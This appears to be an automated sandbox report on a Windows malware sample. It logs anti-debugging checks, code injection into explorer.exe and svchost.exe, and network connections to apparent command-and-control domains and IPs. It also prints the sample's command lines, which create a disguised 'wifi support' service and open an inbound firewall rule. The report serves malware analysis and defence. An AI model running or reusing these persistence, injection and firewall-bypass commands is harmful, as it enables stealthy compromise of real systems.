                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeSystem information queried: ModuleInformation

                          Anti Debugging:

                          barindex
                          Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))Show sources
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeSystem information queried: CodeIntegrityInformation
                          Source: C:\Users\user\AppData\Roaming\rifssweSystem information queried: CodeIntegrityInformation
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 0_2_0042D9F0 LoadLibraryW,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 9_2_00630042 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\9334.exeCode function: 11_2_00470083 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\9334.exeCode function: 11_2_0048092B mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\9334.exeCode function: 11_2_00480D90 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_00401000 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_0040C180 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCode function: 17_2_0063092B mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCode function: 17_2_00630D90 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCode function: 17_2_00893515 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Roaming\rifssweProcess queried: DebugPort
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 0_2_0043B960 IsDebuggerPresent,DebuggerProbe,
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_004048D0 VirtualProtect ?,00000004,00000100,00000000
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 0_2_0042CDF2 InterlockedIncrement,__itow_s,__invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,_wcscpy_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,__snwprintf_s,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,GetFileType,_wcslen,WriteConsoleW,GetLastError,__invoke_watson_if_oneof,_wcslen,WriteFile,WriteFile,OutputDebugStringW,__itow_s,__invoke_watson_if_error,___crtMessageWindowW,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 0_2_00419E0A SetLastError,GetConsoleCursorInfo,GetProfileStringA,WriteProfileSectionW,GetProfileStringA,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryW,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoW,ReadConsoleOutputCharacterW,GlobalUnWire,GetProcessHeap,GetProcessHeaps,WritePrivateProfileStringA,GetPriorityClass,
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeMemory protected: page guard
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 0_2_0043AD20 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 0_2_00422E10 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 0_2_0042BF30 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 0_2_004287A0 SetUnhandledExceptionFilter,
                          Source: C:\Users\user\AppData\Local\Temp\9334.exeCode function: 11_2_0040976C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCode function: 17_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exeCode function: 32_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                          HIPS / PFW / Operating System Protection Evasion:

                          barindex
                          System process connects to network (likely due to code injection or exploit)Show sources
                          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 40.93.207.0 25
                          Source: C:\Windows\explorer.exeDomain query: patmushta.info
                          Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                          Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80
                          Source: C:\Windows\explorer.exeDomain query: unicupload.top
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.188.183.61 443
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                          Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                          Source: C:\Windows\SysWOW64\svchost.exeDomain query: microsoft-com.mail.protection.outlook.com
                          Source: C:\Windows\explorer.exeDomain query: goo.su
                          Source: C:\Windows\explorer.exeDomain query: transfer.sh
                          Source: C:\Windows\explorer.exeDomain query: a0621298.xsph.ru
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                          Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                          Benign windows process drops PE filesShow sources
                          Source: C:\Windows\explorer.exeFile created: 6FB4.exe.5.drJump to dropped file
                          Maps a DLL or memory area into another processShow sources
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                          Source: C:\Users\user\AppData\Roaming\rifssweSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                          Source: C:\Users\user\AppData\Roaming\rifssweSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                          Allocates memory in foreign processesShow sources
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 5D0000 protect: page execute and read and write
                          Injects a PE file into a foreign processesShow sources
                          Source: C:\Users\user\AppData\Roaming\rifssweMemory written: C:\Users\user\AppData\Roaming\rifsswe base: 400000 value starts with: 4D5A
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeMemory written: C:\Users\user\AppData\Local\Temp\F65C.exe base: 400000 value starts with: 4D5A
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5D0000 value starts with: 4D5A
                          Contains functionality to inject code into remote processesShow sources
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 9_2_00630110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                          Creates a thread in another existing process (thread injection)Show sources
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeThread created: C:\Windows\explorer.exe EIP: 4DF1930
                          Source: C:\Users\user\AppData\Roaming\rifssweThread created: unknown EIP: 4F11930
                          Writes to foreign memory regionsShow sources
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5D0000
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 79A008
                          .NET source code references suspicious native API functionsShow sources
                          Source: F65C.exe.5.dr, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: F65C.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 18.0.F65C.exe.ab0000.2.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 18.0.F65C.exe.ab0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 18.0.F65C.exe.ab0000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 18.0.F65C.exe.ab0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 18.0.F65C.exe.ab0000.3.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 18.0.F65C.exe.ab0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 18.0.F65C.exe.ab0000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 18.0.F65C.exe.ab0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 35.0.F65C.exe.400000.6.unpack, NativeHelper.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 35.0.F65C.exe.4d0000.13.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 35.0.F65C.exe.4d0000.13.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 35.0.F65C.exe.4d0000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 35.0.F65C.exe.4d0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 35.0.F65C.exe.4d0000.7.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 35.0.F65C.exe.4d0000.7.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeProcess created: C:\Users\user\Desktop\tijXCZsbGe.exe "C:\Users\user\Desktop\tijXCZsbGe.exe"
                          Source: C:\Users\user\AppData\Roaming\rifssweProcess created: C:\Users\user\AppData\Roaming\rifsswe C:\Users\user\AppData\Roaming\rifsswe
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 7100 -ip 7100
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 264
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\xzxafeeu\
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\gecrjwsv.exe" C:\Windows\SysWOW64\xzxafeeu\
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create xzxafeeu binPath= "C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe /d\"C:\Users\user\AppData\Local\Temp\E748.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description xzxafeeu "wifi internet conection
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start xzxafeeu
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess created: C:\Users\user\AppData\Local\Temp\F65C.exe C:\Users\user\AppData\Local\Temp\F65C.exe
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCode function: 17_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCode function: 17_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,
                          Source: explorer.exe, 00000005.00000000.691706298.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.706546747.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.681908870.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
                          Source: explorer.exe, 00000005.00000000.682065260.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.691924618.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.706731711.0000000001080000.00000002.00020000.sdmp, 9334.exe, 0000000B.00000000.766594639.0000000000D20000.00000002.00020000.sdmp, 9334.exe, 0000000B.00000000.767305300.0000000000D20000.00000002.00020000.sdmp, E748.exe, 00000011.00000002.968917463.0000000000E10000.00000002.00020000.sdmp, 5C89.exe, 00000026.00000002.1003144120.0000000003890000.00000002.00020000.sdmpBinary or memory string: Program Manager
                          Source: explorer.exe, 00000005.00000000.683418224.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.682065260.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.691924618.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.706731711.0000000001080000.00000002.00020000.sdmp, 9334.exe, 0000000B.00000000.766594639.0000000000D20000.00000002.00020000.sdmp, 9334.exe, 0000000B.00000000.767305300.0000000000D20000.00000002.00020000.sdmp, E748.exe, 00000011.00000002.968917463.0000000000E10000.00000002.00020000.sdmp, 5C89.exe, 00000026.00000002.1003144120.0000000003890000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                          Source: explorer.exe, 00000005.00000000.682065260.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.691924618.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.706731711.0000000001080000.00000002.00020000.sdmp, 9334.exe, 0000000B.00000000.766594639.0000000000D20000.00000002.00020000.sdmp, 9334.exe, 0000000B.00000000.767305300.0000000000D20000.00000002.00020000.sdmp, E748.exe, 00000011.00000002.968917463.0000000000E10000.00000002.00020000.sdmp, 5C89.exe, 00000026.00000002.1003144120.0000000003890000.00000002.00020000.sdmpBinary or memory string: Progman
                          Source: explorer.exe, 00000005.00000000.682065260.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.691924618.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.706731711.0000000001080000.00000002.00020000.sdmp, 9334.exe, 0000000B.00000000.766594639.0000000000D20000.00000002.00020000.sdmp, 9334.exe, 0000000B.00000000.767305300.0000000000D20000.00000002.00020000.sdmp, E748.exe, 00000011.00000002.968917463.0000000000E10000.00000002.00020000.sdmp, 5C89.exe, 00000026.00000002.1003144120.0000000003890000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                          Source: explorer.exe, 00000005.00000000.713264043.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.686584813.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.702098679.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: GetLocaleInfoA,
                          Source: C:\Users\user\AppData\Local\Temp\9334.exeCode function: GetLocaleInfoA,
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeQueries volume information: C:\Users\user\AppData\Local\Temp\F65C.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeQueries volume information: C:\Users\user\AppData\Local\Temp\F65C.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 0_2_0041A069 __vswprintf,_putc,__wrename,_atexit,_malloc,_realloc,_ferror,GetBinaryTypeA,SetCurrentDirectoryA,Process32NextW,InitializeCriticalSection,QueryDosDeviceW,TerminateJobObject,GlobalAddAtomW,DeleteAtom,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointW,GetCompressedFileSizeA,GetNamedPipeInfo,lstrcpynA,GetProcessVersion,GetConsoleAliasesLengthW,UnregisterWait,GetProcessHandleCount,CancelWaitableTimer,SetFileApisToANSI,CreateIoCompletionPort,FindClose,SetEndOfFile,GetCommMask,LocalLock,OpenMutexW,GetLastError,HeapFree,WriteConsoleOutputCharacterA,GetModuleHandleW,GetNumberOfConsoleInputEvents,FreeEnvironmentStringsA,GetWriteWatch,GetConsoleAliasExesLengthW,_lopen,FileTimeToLocalFileTime,SetCommState,EnumDateFormatsA,TransactNamedPipe,WriteConsoleInputW,GetConsoleAliasExesLengthA,GetAtomNameW,FreeConsole,FlushConsoleInputBuffer,GetConsoleAliasA,SetConsoleCP,VerSetConditionMask,LockFile,SetSystemTime,SetThreadExecutionState,VerLanguageNameW,lstrcpyA,SetFileShortNameW,GetOverlappedResult,GetPrivateProfileSectionW,FreeEnvironmentStringsW,CreateSemaphoreA,GetLocalTime,EnumTimeFormatsW,FindResourceExW,GetPrivateProfileSectionNamesW,GetOverlappedResult,WaitNamedPipeA,TransmitCommChar,CreateSemaphoreW,GetBinaryTypeW,PeekConsoleInputW,BuildCommDCBA,UnregisterWaitEx,GlobalLock,GetOverlappedResult,GetProcAddress,MoveFileExW,GetThreadContext,ResetEvent,FindActCtxSectionStringA,_memset,SetDefaultCommConfigW,lstrcmpW,HeapUnlock,GetConsoleMode,GetVolumePathNameA,MoveFileW,Process32NextW,GetFileAttributesExA,GetDriveTypeA,TryEnterCriticalSection,GetPrivateProfileStructW,WritePrivateProfileSectionA,GetPrivateProfileSectionW,GetSystemTimeAdjustment,W